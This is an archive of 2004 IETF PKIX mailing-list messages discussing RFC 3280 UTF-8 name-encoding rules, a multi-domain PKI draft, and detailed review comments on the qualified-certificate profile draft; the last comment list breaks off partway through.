>> Date : 2004-1-20 >> >>This document forms a certificate profile, based on RFC 3280, for >> identity certificates issued to natural persons. >> The profile defines specific conventions for certificates that are >> qualified within a defined legal framework, named Qualified >> Certificates. The profile does however not define any legal >> requirements for such Qualified Certificates. >> The goal of this document is to define a certificate profile that >> supports issuance of Qualified Certificates independent of local >> legal requirements. The profile is however not limited to Qualified >> Certificates and further profiling may facilitate specific local >> needs. >>A URL for this Internet-Draft is: >>http://www.ietf.org/internet-drafts/draft-ietf-pkix-sonof3039-03.txt >>To remove yourself from the IETF Announcement list, send a message to >>ietf-announce-request with the word unsubscribe in the body of the message. >>Internet-Drafts are also available by anonymous FTP. Login with the username >>"anonymous" and a password of your e-mail address. After logging in, >>type "cd internet-drafts" and then >> "get draft-ietf-pkix-sonof3039-03.txt". >>A list of Internet-Drafts directories can be found in >>http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt >> >>Internet-Drafts can also be obtained by e-mail. >>Send a message to: >> mailserv@ietf.org. >>In the body type: >> "FILE /internet-drafts/draft-ietf-pkix-sonof3039-03.txt". >> >>NOTE: The mail server at ietf.org can return the document in >> MIME-encoded form by using the "mpack" utility. To use this >> feature, insert the command "ENCODING mime" before the "FILE" >> command. To decode the response(s), you will need "munpack" or >> a MIME-compliant mail reader. Different MIME-compliant mail readers >> exhibit different behavior, especially when dealing with >> "multipart" MIME messages (i.e. documents which have been split >> up into multiple messages), so check your local documentation on >> how to manipulate these messages. >> >> >>Below is the data which will enable a MIME compliant mail reader >>implementation to automatically retrieve the ASCII version of the >>Internet-Draft. > > > Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0QHNEYe050340; Mon, 26 Jan 2004 09:23:14 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0QHNEex050339; Mon, 26 Jan 2004 09:23:14 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mail-dub.microsoft.com (mail-dub.microsoft.com [213.199.128.160]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0QHNAvd050307 for <ietf-pkix@imc.org>; Mon, 26 Jan 2004 09:23:10 -0800 (PST) (envelope-from stefans@microsoft.com) Received: from dub-imc-01.europe.corp.microsoft.com ([65.53.196.35]) by mail-dub.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Mon, 26 Jan 2004 17:23:01 +0000 Received: from 65.53.196.35 by dub-imc-01.europe.corp.microsoft.com (InterScan E-Mail VirusWall NT); Mon, 26 Jan 2004 17:23:01 -0000 Received: from EUR-MSG-03.europe.corp.microsoft.com ([65.53.192.44]) by dub-imc-01.europe.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Mon, 26 Jan 2004 17:23:00 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.5.7122.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="------------InterScan_NT_MIME_Boundary" Subject: UTF-8 encoding after December 31 2003 Date: Mon, 26 Jan 2004 17:22:33 -0000 Message-ID: <0C3042E92D8A714783E2C44AB9936E1DB13888@EUR-MSG-03.europe.corp.microsoft.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: UTF-8 encoding after December 31 2003 Thread-Index: AcPkMPwvrZQsO2diT4+G4hV9EogPPQ== From: "Stefan Santesson" <stefans@microsoft.com> To: <ietf-pkix@imc.org> X-OriginalArrivalTime: 26 Jan 2004 17:23:00.0923 (UTC) FILETIME=[0C68C8B0:01C3E431] Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> This is a multi-part message in MIME format. --------------InterScan_NT_MIME_Boundary Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C3E431.0D3286EB" ------_=_NextPart_001_01C3E431.0D3286EB Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable All, =20 I have a problem with the UTF-8 requirements in RFC 3280 after December 31, and would appreciate guidance on interpretation of RFC 3280 as well as other implementers view on this. =20 The situation: =20 Conforming CA:s must encode attributes of DirectotyString types as UTF-8 after=20 December 31, 2003. =20 Exceptions are stated in RFC 3280 (section 4.1.2.4): =20 Exceptions to the December 31, 2003 UTF8 encoding requirements are as follows: =20 (a) CAs MAY issue "name rollover" certificates to support an orderly migration to UTF8String encoding. Such certificates would include the CA's UTF8String encoded name as issuer and and the old name encoding as subject, or vice-versa. =20 (b) As stated in section 4.1.2.6, the subject field MUST be populated with a non-empty distinguished name matching the contents of the issuer field in all certificates issued by the subject CA regardless of encoding. =20 =20 My interpretation of this is: =20 a) only applies for self issued certificates with the same CA name as issuer and subject (but in different encodings). Introducing such name roll-over certificates extend the certificate chain and may be problematic since it may break both naming and path length constraints expressed by chaining CAs. =20 b) seams to be a catch 22. You can populate the subject field with old encoding to match old encoded issuer names in descending certificates, but since no descending CA can populate the issuer field with old encoding it doesn't really apply. =20 =20 The issue: There seems to be a problem with practical reality here in case the interpretation above is correct. =20 Question 1) What if I have a Root CA valid to 2020 with subject and issuer name in old encoding? =20 Can that Root CA issue an intermediary CA certificate with the issuer field in old encoding, matching the subject field of the current root CA Certificate? =20 Question 2) What if I have a CA with a current operating CA certificate that expires 2006. Can this CA issue certificates after December 31, with the issuer name in old encoding, matching the encoding of the current CA certificate until it expires, or must this CA change its name and have its CA certificate renewed before December 31? =20 If RFC 3280 prevents operating CAs to issue certificates with the issuer field matching the CA:s current certificate, until it expires, then we face a huge legacy problem. Especially since name matching for different encoding types are not required. =20 4.1.2.4 states "(a) attribute values encoded in different types (e.g., PrintableString and BMPString) MAY be assumed to represent different strings;" =20 =20 If my concerns are wrong and the issuing such certificates is allowed, then this needs to be clarified. =20 =20 =20 Stefan Santesson Program Manager, Windows Security =20 ------_=_NextPart_001_01C3E431.0D3286EB Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0cm; margin-bottom:.0001pt; font-size:10.0pt; font-family:"Courier New";} span.EmailStyle17 {mso-style-type:personal-compose; font-family:Arial; color:windowtext;} @page Section1 {size:612.0pt 792.0pt; margin:70.85pt 70.85pt 70.85pt 70.85pt;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>All,<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>I have a problem with the UTF-8 requirements in RFC 3280 after = December 31, and would appreciate guidance on interpretation of RFC 3280 as well = as other implementers view on this.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>The situation:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Conforming CA:s must encode attributes of DirectotyString types = as UTF-8 after <o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>December 31, 2003.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Exceptions are stated in RFC 3280 (section = 4.1.2.4):<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> Exceptions to the December 31, 2003 UTF8 encoding requirements are as<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> follows:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> (a) CAs MAY issue = "name rollover" certificates to support an<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> orderly migration to UTF8String encoding. Such certificates would<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> include the CA's UTF8String = encoded name as issuer and and the old<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> name encoding as subject, or = vice-versa.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> (b) As stated in section = 4.1.2.6, the subject field MUST be<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> populated with a non-empty = distinguished name matching the<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> contents of the issuer field in = all certificates issued by the<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> subject CA regardless of = encoding.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>My interpretation of this is:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>a) only applies for self issued certificates with the same CA = name as issuer and subject (but in different encodings). Introducing such name roll-over certificates extend the certificate chain and may be = problematic since it may break both naming and path length constraints expressed by chaining CAs.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>b) seams to be a catch 22. You can populate the subject field = with old encoding to match old encoded issuer names in descending certificates, = but since no descending CA can populate the issuer field with old encoding = it doesn’t really apply.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>The issue:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>There seems to be a problem with practical reality here in case = the interpretation above is correct.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Question 1)<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>What if I have a Root CA valid to 2020 with subject and issuer = name in old encoding?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Can that Root CA issue an intermediary CA certificate with the = issuer field in old encoding, matching the subject field of the current root CA Certificate?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Question 2)<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>What if I have a CA with a current operating CA certificate that expires 2006. Can this CA issue certificates after December 31, with the = issuer name in old encoding, matching the encoding of the current CA = certificate until it expires, or must this CA change its name and have its CA certificate = renewed before December 31?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>If RFC 3280 prevents operating CAs to issue certificates with = the issuer field matching the CA:s current certificate, until it expires, = then we face a huge legacy problem. Especially since name matching for different encoding types are not required.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>4.1.2.4 states<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>“(a) attribute values encoded in different types = (e.g.,<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> PrintableString and BMPString) = MAY be assumed to represent<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> different = strings;”<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>If my concerns are wrong and the issuing such certificates is = allowed, then this needs to be clarified.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><strong><b><font size=3D2 color=3Dolive = face=3DArial><span style=3D'font-size:10.0pt;font-family:Arial;color:olive'>Stefan = Santesson</span></font></b></strong><o:p></o:p></p> <p class=3DMsoNormal><font size=3D2 color=3Dolive face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:olive'>Program Manager, Windows = Security</span></font><o:p></o:p></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p> </o:p></span></font></p> </div> </body> </html> ------_=_NextPart_001_01C3E431.0D3286EB-- --------------InterScan_NT_MIME_Boundary-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0Q9P6wJ007972; Mon, 26 Jan 2004 01:25:06 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0Q9P6cd007971; Mon, 26 Jan 2004 01:25:06 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from odin2.bull.net (odin2.bull.net [192.90.70.84]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0Q9P3Gv007913 for <ietf-pkix@imc.org>; Mon, 26 Jan 2004 01:25:03 -0800 (PST) (envelope-from Denis.Pinkas@bull.net) Received: from clbull.frcl.bull.fr (IDENT:root@clbull.frcl.bull.fr [129.182.8.31]) by odin2.bull.net (8.9.3/8.9.3) with ESMTP id KAA102366; Mon, 26 Jan 2004 10:31:21 +0100 Received: from bull.net (frcls4013.frcl.bull.fr [129.182.108.120]) by clbull.frcl.bull.fr (8.9.3/8.9.3) with ESMTP id LAA22380; Mon, 26 Jan 2004 11:18:59 +0100 Message-ID: <4014DC9E.4070500@bull.net> Date: Mon, 26 Jan 2004 10:23:42 +0100 From: Denis Pinkas <Denis.Pinkas@bull.net> Organization: Bull SA. User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0 X-Accept-Language: en-us, en, fr MIME-Version: 1.0 To: Masaki SHIMAOKA <shimaoka@secom.ne.jp> CC: IETF-PKIX <ietf-pkix@imc.org>, mpki@jnsa.org Subject: Re: Revised I-D: Memorandum for multi-domain PKI Interoperability References: <20040107194923.BA44.SHIMAOKA@secom.ne.jp> <20040114194632.05BD.SHIMAOKA@secom.ne.jp> Content-Type: text/plain; charset=windows-1252; format=flowed Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0Q9P5Gv007958 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> > All, > > As I presented in 57th IETF meeting, I propose to make a consensus for > multi-domain PKI interoperability. To consider such consensus, I was > writing this I-D, and I finished it. > Please review the I-D and let me know your opinion. > > You can obtain the I-D from: > http://www.ietf.org/internet-drafts/draft-shimaoka-multidomain-pki-02.txt > > Original presentation: > http://www.ietf.org/proceedings/03jul/slides/pkix-9/index.html > > Working Page: > http://www.jnsa.org/mpki/#id > > At 56th IETF, I discussed with Tim how to standardize this I-D. As > result, PKIX WG seemed difficult to holding the ID as new WG draft. So I > am proposing this as personal draft. Comments on draft-shimaoka-multidomain-pki-02.txt The document does not reflect what can be called best current practice. RFC 2026 states: The BCP subseries of the RFC series is designed to be a way to standardize practices and the results of community deliberations. A BCP document is subject to the same basic set of procedures as standards track documents and thus is a vehicle by which the IETF community can define and ratify the community's best current thinking on a statement of principle or on what is believed to be the best way to perform some operations or IETF process function. The topic of the document is rather close to the following draft: Internet X.509 Public Key Infrastructure: Certification Path Building available at: http://www.ietf.org/internet-drafts/draft-ietf-pkix-certpathbuild-03.txt It seems rather difficult to have two documents on nearly the same topic. It also seems difficult to issue this document as an Informational RFC. RFC 2026 states: To ensure that the non-standards track Experimental and Informational designations are not misused to circumvent the Internet Standards Process, the IESG and the RFC Editor have agreed that the RFC Editor will refer to the IESG any document submitted for Experimental or Informational publication which, in the opinion of the RFC Editor, may be related to work being done, or expected to be done, within the IETF community. The document contains vocabulary which is not currently used with the PKIX WG and which could create confusion if adopted. The notion of PKI domain is misleading. The PKIX WG has been using the concept of validation policy to describe the rules applicable to trust a given certificate. However, this terminology is not used in this document. The definition of subscriber is misleading and should not be confused with subject. It is also misleading to say In a single-domain PKI (whatever this notion may mean), these [i.e. trust anchors] may be omitted tacitly. There always exists at least one trust anchor, otherwise it is impossible to verify a certificate. The wordings unified domain model and unificate CA are introduced but are not explained. The definition of PKI domain which seems to map to the concept of validation policy is wrong: the MUST and SHOULD included in the definition are wrong. The notion of domain policy is inadequate as well. The notion of Mesh PKI is introduced in the definition section, but is not explained. The notion of principal CA is not needed. The notion of PKI domain of the subscriber is unclear. Does it means that the CA that has issued the end-entity certificate musty issue a self-signed certificate ? What is the difference between a trust anchor and a trust point ? The notions of Public PKI and Private PKI are not appropriate. What can be a trust point registered without clear agreement ??? Trust relationship cant be restricted to Trust relationships between CAs. There are first between CAs and relying parties. There is no reason why CAs in a trust list SHOULD NOT cross-certify each other. The most important case for trust list has been omitted: it is when the trust list is establish by an authority which trusts some CAs. Then relying parties trusting that authority can use the trust lists established by that authority for some specific purpose. In section 3.2 about Cross-Certification there should not be the following requirements : " CA that issues a cross-certificate MUST have a self-signed certificate". " CA issued the cross-certificate also MUST have a self-signed certificate" For the above reasons, I do not believe that this document should be progressed any further. Denis > shima > > > ----- > Masaki SHIMAOKA > > SECOM Trust.net > System Engineering Dpt. > Tel: +81 422 91 8498 (ext.3605) > Fax: +81 422 45 0536 > e-mail: shimaoka@secom.ne.jp > > Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0Q95ICf000604; Mon, 26 Jan 2004 01:05:18 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0Q95IJe000603; Mon, 26 Jan 2004 01:05:18 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from odin2.bull.net (odin2.bull.net [192.90.70.84]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0Q95Efs000549 for <ietf-pkix@imc.org>; Mon, 26 Jan 2004 01:05:15 -0800 (PST) (envelope-from Denis.Pinkas@bull.net) Received: from clbull.frcl.bull.fr (IDENT:root@clbull.frcl.bull.fr [129.182.8.31]) by odin2.bull.net (8.9.3/8.9.3) with ESMTP id KAA57638; Mon, 26 Jan 2004 10:12:43 +0100 Received: from bull.net (frcls4013.frcl.bull.fr [129.182.108.120]) by clbull.frcl.bull.fr (8.9.3/8.9.3) with ESMTP id LAA22258; Mon, 26 Jan 2004 11:00:22 +0100 Message-ID: <4014D841.503@bull.net> Date: Mon, 26 Jan 2004 10:05:05 +0100 From: Denis Pinkas <Denis.Pinkas@bull.net> Organization: Bull SA. User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0 X-Accept-Language: en-us, en, fr MIME-Version: 1.0 To: Stefan Santesson <stefans@microsoft.com>, Tim Polk <wpolk@nist.gov>, Magnus Nystrom <magnus@RSASECURITY.COM> CC: ietf-pkix@imc.org Subject: Re: I-D ACTION:draft-ietf-pkix-sonof3039-03.txt References: <200401202044.PAA20813@ietf.org> Content-Type: text/plain; charset=windows-1252; format=flowed Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0Q95Hfs000593 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Stefan, Magnus and Tim, Please find 38 comments on <draft-ietf-pkix-sonof3039-03.txt> 1. The text states: "The profile defines specific conventions for certificates that are qualified within a defined legal framework, named Qualified Certificates." It is unclear what the topic of this document is about. This sentence does not explain. To illustrate the concern if we had the following sentence, it would be the same problem : "The profile defines specific conventions for certificates that are certified within a defined legal framework, named Certified Certificates." What means qualified ? What would mean certified ? Since the definition of a legal framework is outside the scope, it could be any kind of certificate as long as it is issued for a natural person, which is the only restriction advertised. Then why is it under a "legal framework" ? It would be appropriate under any kind of certificate policy. The text should not place any emphasis on a "legal framework". This document simply defines a profile of a certificate for natural persons. The technical content of this document should be clearly advertised. Hereafter is a proposal, intended to be a full replacement of the second paragraph : This document provides a profile for two fields: issuer and subject and for three certificate extensions: subject alternate name, subject directory attributes, and key usage. It also defines two extensions: biometric information and qualified certificate statements. 2. The use of the wording "Qualified Certificate" is unfortunate since it creates a confusion with the same wording used in the European Directive on Electronic Signatures. If the wording "qualified certificate" needs to be kept, a warning should be given in the abstract. In order to avoid readers to misunderstand what is a qualified certificate in the context of this document, the following sentence should be added: "It should be noticed that the meaning of "Qualified Certificate" as used in this document is different from the same wording used in the European Directive on Electronic Signatures." The European Directive on Electronic Signatures should be referenced in the informative reference section. 3. In section 1, 6 th paragraph, the text states: "It should be noted that this specification does not define the specific semantics of Qualified Certificates, and does not define the policies that should be used with them. That is, this document defines what information should go into Qualified Certificates, but not what that information means. A system that uses Qualified Certificates must define its own semantics for the information in Qualified Certificates. It is expected that laws and corporate policies will make these definitions." This is not true. The only semantics which is undefined is the semantics of specific Qualified Certificate Statements. Please delete. 4. The text states: "This specification differs from RFC 3039 in the following basic areas: * Some editorial clarifications has been made to introductory sections to clarify that this profile is generally applicable to a broad type of certificates even if its prime purpose is to facilitate issuance of Qualified Certificates." The abstract states : " The profile is however not limited to Qualified Certificates and further profiling may facilitate specific local needs." Since a Qualified Certificate is a profile limited to natural person, it is unclear to understand what this sentence means. Please delete. 5. The text states: * To better facilitate broad applicability of this profile some constraints on key usage settings in the key usage extension has been removed. This "constraints" were a recommendation that is still true and is currently proposed to be included to answer to a "defect report" raised on key usage on X.509 / IS0 9594-8. It is likely that this constraint will be accepted. This explanation should be removed and the recommendation that is present in RFC 3039 should remain. 6. The text states: * A new qc-Statement reflecting this second version of the profile has been defined in Section 3.2.5.1 What about backwards compatibility ? Has anybody used the predefined qcStatement-1 ? Until we got a confirmed no response, it is not possible to suppress the document (i.e. RFC 3039) which tells what it means. Otherwise, implementations based on RFC3039 will suddenly become invalid. If nobody has ever implemented the predefined qcStatement-1, then there would be no reason to support it in 3039bis. 7. The text states in section 2 , Requirements and Assumptions. "The term "Qualified Certificate" has been used by the European Commission to describe a certain type of certificates with specific relevance for European legislation. This specification is intended to support this class of certificates, but its scope is not limited to this application. Within this standard the term "Qualified Certificate" is used generally, describing a certificate whose primary purpose is to identify a person with high level of assurance, where the certificate meet some qualification requirements defined by an applicable legal framework. The actual mechanisms that decide whether a certificate should or should not be considered to be a "Qualified Certificate" in regard to any legislation are outside the scope of this standard." Full text proposal replacement: "The term "Qualified Certificate" is used by the European Directive on Electronic Signature to refer to specific type of certificate. The same term is used in this document with a different meaning, i.e. to define a profile of a certificate issued to natural persons, and which imposes constraints on the structure of the name of the subject and of the issuer." 8. The text states in section 2 , Requirements and Assumptions. "Harmonization in the field of identity certificates issued to natural persons, in particular Qualified Certificates, is essential within several aspects that fall outside the scope of RFC 3280." This sentence is using the term "identity certificate" instead of "Qualified certificate". This is in fact much better and it is unfortunate to use the term "Qualified Certificate" everywhere within this document instead of "Identity certificate". This sentence should be deleted, since it is difficult to argue that harmonisation is essential without providing any reason. 9. The text states in section 2 , Requirements and Assumptions. "The most important aspects that affect the scope of this specification are: - Definition of names and identity information in order to identify the associated subject in a uniform way." What is the difference between a "name" and an "identity information" ? Can a name identify a subject ? Not always. Proposed rewording: The most important aspects that affect the scope of this specification are: - Definition of attributes of the subject DN in order to name the associated subject in a uniform way." 10. The text states in section 2 , Requirements and Assumptions. "The most important aspects that affect the scope of this specification are: - Definition of information which identifies the CA and the jurisdiction under which the CA operates when issuing a particular certificate. Qualified certificates (as meant by this document) are supposed to be applicable for a "defined legal framework". What is the relationship with the "jurisdiction under which the CA operates" ? Qualified certificates (as meant by the EU Directive) identify the country where the CA operates. While this has a well defined meaning, it seems rather difficult to give a meaning to this statement outside the EU Directive. Proposed rewording: "The most important aspects that affect the scope of this specification are: - Definition of information which identifies the country where the CA operates when issuing a certificate." 11. The text states in section 2 , Requirements and Assumptions. "The most important aspects that affect the scope of this specification are: - Definition of a standardized way to store predefined statements with relevance for Qualified Certificates." Delete: "with relevance for Qualified Certificates". 12. The text states in section 2.1 Properties: "This profile accommodates profiling needs for Qualified Certificates based on the assumptions that: - Qualified Certificates are issued by a CA that makes a public statement that the certificate serves the purpose of a Qualified Certificate, as discussed in Section 2.2." It is quite strange to mandate to make a public statement here. Do we require a public statement when RFC 3280 compliant certificates are issued ? To which of the sections would it mean compliance ? Delete this item. 13. The text states in section 2.1 Properties: - The Qualified Certificate indicates a certificate policy consistent with liabilities, practices and procedures undertaken by the CA, as discussed in Section 2.3." There is no precise definition of such a certificate policy and precise definitions are outside the scope of the PKIX WG. Delete this item. 14. The text states in section 2.1 Properties: - The Qualified Certificate contains an identity based on a pseudonym or a real name of the subject. No identity is ever contained in a certificate. Proposed rewording: - The Qualified Certificate contains a name which may be either based on the real name of the subject or a pseudonym." 15. The text states in section 2.2 Statement of Purpose "This profile defines two complementary ways to include this information: - As information defined by 